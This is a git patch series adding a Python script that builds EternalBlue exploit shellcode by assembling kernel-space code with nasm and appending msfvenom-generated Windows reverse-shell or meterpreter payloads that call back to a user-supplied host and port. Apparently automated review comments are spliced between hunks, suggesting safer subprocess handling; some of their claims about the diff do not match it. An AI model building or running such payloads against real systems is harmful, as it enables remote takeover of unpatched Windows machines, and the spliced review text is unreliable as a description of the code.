From 93028805010ce0714cb60a7611f482c2b7400c6b Mon Sep 17 00:00:00 2001
From: phi10s <35280353+phi10s@users.noreply.github.com>
Date: Wed, 27 Mar 2019 18:50:33 -0400
Subject: [PATCH 1/4] Create generate_shellcode.py
---
 shellcode/generate_shellcode.py | 45 +++++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 shellcode/generate_shellcode.py
diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py
new file mode 100644
index 0000000..16bd0f0
--- /dev/null
+++ b/shellcode/generate_shellcode.py
@@ -0,0 +1,45 @@ +#!/usr/bin/python + +'''This script generates shellcode for use with EternalBlue exploits, +by utilizing msfvenom to generate user-space code, then concatenating +it with the supplied kernel-space code. It gives the user a choice of +a couple payloads each for x86 and x64 architectures.''' + +__author__="phi10s" + +import argparse +import subprocess +import sys + +parser = argparse.ArgumentParser() +parser.add_argument("lhost", help="Local IP address for revere connection") +parser.add_argument("lport", help="Local port number") +parser.add_argument("outfile",help="Name for the resulting shellcode binary") +parser.add_argument("-p","--payload", choices=["s","n","m"], default="n", + help="Choose reverse shell payload\ns = staged\nn " + + "= non-staged\nm = meterpreter\n(Default = non-staged)") +parser.add_argument("-a","--arch", help="Target architecture (Default = x86)", + choices=["x86","x64"], default="x86") +args = parser.parse_args() +# print(args) + + +if args.arch == "x64": + x64_payloads = {"s":"windows/x64/shell/reverse_tcp","m":"windows/x64/meterpreter/reverse_tcp", + "n":"windows/x64/shell_reverse_tcp"} + msfpayload = x64_payloads[args.payload] + genshellcode = "msfvenom -p " + msfpayload + " -f raw " + "-o userspacesc.tmp " \ + + "EXITFUNC=thread " + "lhost=" + args.lhost + " lport=" + args.lport + subprocess.call(genshellcode,shell=True) + subprocess.call("cat eternalblue_kshellcode_x64 userspacesc.tmp > " + args.outfile, shell=True) + subprocess.call("rm userspacesc.tmp",shell=True) +else: + x86_payloads = {"s":"windows/shell/reverse_tcp","m":"windows/meterpreter/reverse_tcp", + "n":"windows/shell_reverse_tcp"} + msfpayload = x86_payloads[args.payload] + genshellcode = "msfvenom -p " + msfpayload + " -f raw " + "-o userspacesc.tmp " \ + + "EXITFUNC=thread " + "lhost=" + args.lhost + " lport=" + args.lport + subprocess.call(genshellcode,shell=True) + subprocess.call("cat eternalblue_kshellcode_x86 userspacesc.tmp > " + args.outfile, 
shell=True) + subprocess.call("rm userspacesc.tmp",shell=True) +print("\n[*] Generated " + msfpayload + " payload")
From a8d0174dbe6f6d51e989e84cc758c05bdf091e67 Mon Sep 17 00:00:00 2001
From: phi10s <35280353+phi10s@users.noreply.github.com>
Date: Wed, 27 Mar 2019 19:12:19 -0400
Subject: [PATCH 2/4] Update generate_shellcode.py
---
 shellcode/generate_shellcode.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py
index 16bd0f0..99a607a 100644
--- a/shellcode/generate_shellcode.py
+++ b/shellcode/generate_shellcode.py
@@ -12,7 +12,7 @@
 import sys parser = argparse.ArgumentParser() -parser.add_argument("lhost", help="Local IP address for revere connection") +parser.add_argument("lhost", help="Local IP address for reverse connection") parser.add_argument("lport", help="Local port number") parser.add_argument("outfile",help="Name for the resulting shellcode binary") parser.add_argument("-p","--payload", choices=["s","n","m"], default="n",
From 1fdb812b49a44e3fece3f6adc3212b5bad61459e Mon Sep 17 00:00:00 2001
From: phi10s <35280353+phi10s@users.noreply.github.com>
Date: Wed, 27 Mar 2019 19:35:27 -0400
Subject: [PATCH 3/4] Update generate_shellcode.py
---
 shellcode/generate_shellcode.py | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)
diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py
index 99a607a..3a17f1b 100644
--- a/shellcode/generate_shellcode.py
+++ b/shellcode/generate_shellcode.py
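Review bot: `args.lhost`, `args.lport` and `args.outfile` are concatenated into the `msfvenom` and `cat ... > ` command strings that run under `shell=True`, so any shell metacharacter in those arguments is interpreted by the shell instead of being treated as data, and every `subprocess.call` return code is discarded, so when msfvenom is missing or rejects the payload the script still runs `cat`, writes an outfile that holds only the kernel stub (or nothing) and prints "Generated ... payload". Passing an argument list to `subprocess.check_call` removes the shell and aborts on the first failing step; the concatenation and cleanup belong in Python (`open(..., "rb")` / `os.remove`) rather than `cat` / `rm`, which needs `import os` in the import block, where `import sys` is currently unused. Declaring `lport` with `type=int` would additionally reject non-numeric ports before anything is executed. The same shell-string / unchecked-return pattern recurs in the `nasm` calls added by the first hunk of PATCH 3/4. This hunk is the whole file, a flat script with no function boundary; the x86 branch needs the identical change with `x86_payloads` and `eternalblue_kshellcode_x86`.
```python
# … unchanged: docstring, imports, argparse setup, x64_payloads table …
    msfpayload = x64_payloads[args.payload]
    # Argument list: lhost/lport/outfile are never parsed by a shell, and
    # check_call stops here if msfvenom is missing or rejects the payload.
    subprocess.check_call(["msfvenom", "-p", msfpayload, "-f", "raw",
                           "-o", "userspacesc.tmp", "EXITFUNC=thread",
                           "lhost=" + args.lhost,
                           "lport=" + str(args.lport)])
    # Concatenate in Python instead of `cat ... > outfile` through the shell.
    with open("eternalblue_kshellcode_x64", "rb") as kernel, \
         open("userspacesc.tmp", "rb") as user, \
         open(args.outfile, "wb") as out:
        out.write(kernel.read())
        out.write(user.read())
    os.remove("userspacesc.tmp")
# … unchanged: x86 branch (same change with x86_payloads and
#     eternalblue_kshellcode_x86), final print …
```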
@@ -23,13 +23,19 @@
 args = parser.parse_args() # print(args) - +print("\n[*] Assembling kernel space shellcode binary\n") +subprocess.call("nasm -f bin eternalblue_kshellcode_x86.asm", shell=True) +subprocess.call("nasm -f bin eternalblue_kshellcode_x64.asm", shell=True) +print("\n[*] Invoking msfvenom to generate userspace shellcode binary\n") if args.arch == "x64": - x64_payloads = {"s":"windows/x64/shell/reverse_tcp","m":"windows/x64/meterpreter/reverse_tcp", + x64_payloads = {"s":"windows/x64/shell/reverse_tcp", + "m":"windows/x64/meterpreter/reverse_tcp", "n":"windows/x64/shell_reverse_tcp"} msfpayload = x64_payloads[args.payload] - genshellcode = "msfvenom -p " + msfpayload + " -f raw " + "-o userspacesc.tmp " \ - + "EXITFUNC=thread " + "lhost=" + args.lhost + " lport=" + args.lport + genshellcode = "msfvenom -p " + msfpayload + \ + " -f raw " + "-o userspacesc.tmp " \ + + "EXITFUNC=thread " + "lhost=" + args.lhost \ + + " lport=" + args.lport subprocess.call(genshellcode,shell=True) subprocess.call("cat eternalblue_kshellcode_x64 userspacesc.tmp > " + args.outfile, shell=True) subprocess.call("rm userspacesc.tmp",shell=True)
@@ -42,4 +48,4 @@
 subprocess.call(genshellcode,shell=True) subprocess.call("cat eternalblue_kshellcode_x86 userspacesc.tmp > " + args.outfile, shell=True) subprocess.call("rm userspacesc.tmp",shell=True) -print("\n[*] Generated " + msfpayload + " payload") +print("\n[*] Generated " + msfpayload + " payload\n")
From 6a42c295e0143301908b090d724c6b51eeb902e1 Mon Sep 17 00:00:00 2001
From: phi10s <35280353+phi10s@users.noreply.github.com>
Date: Wed, 27 Mar 2019 19:40:02 -0400
Subject: [PATCH 4/4] Update generate_shellcode.py
---
 shellcode/generate_shellcode.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py
index 3a17f1b..f5b0512 100644
--- a/shellcode/generate_shellcode.py
+++ b/shellcode/generate_shellcode.py
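Review bot: Both added `nasm -f bin eternalblue_kshellcode_x86.asm` and `... _x64.asm` lines run unconditionally even though only the file for `args.arch` is consumed by the `cat` at the end of this hunk (and its x86 twin in the next one), and the binary names that `cat` relies on are nasm's implicit default (input name minus `.asm`) rather than an explicit output option, so a later rename of either side breaks the pipeline silently. One checked call for the selected architecture makes both dependencies explicit and stops the script before a stale or missing kernel stub gets concatenated: `subprocess.check_call(["nasm", "-f", "bin", "-o", "eternalblue_kshellcode_" + args.arch, "eternalblue_kshellcode_" + args.arch + ".asm"])`. Every path in the script is a bare relative name, so the tool only works when invoked from inside `shellcode/`; resolving them against `os.path.dirname(os.path.abspath(__file__))` would remove that constraint. The script's x86 branch continues past the end of this hunk.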
@@ -1,9 +1,9 @@ #!/usr/bin/python -'''This script generates shellcode for use with EternalBlue exploits, -by utilizing msfvenom to generate user-space code, then concatenating -it with the supplied kernel-space code. It gives the user a choice of -a couple payloads each for x86 and x64 architectures.''' +'''This script generates formatted shellcode for use with EternalBlue exploits, +by assembling the kernel shellcode, then utilizing msfvenom to generate +user-space shellcode, then concatenating it with the kernel-space code. It +gives the user a choice of a couple payloads each for x86 and x64 architectures.''' __author__="phi10s"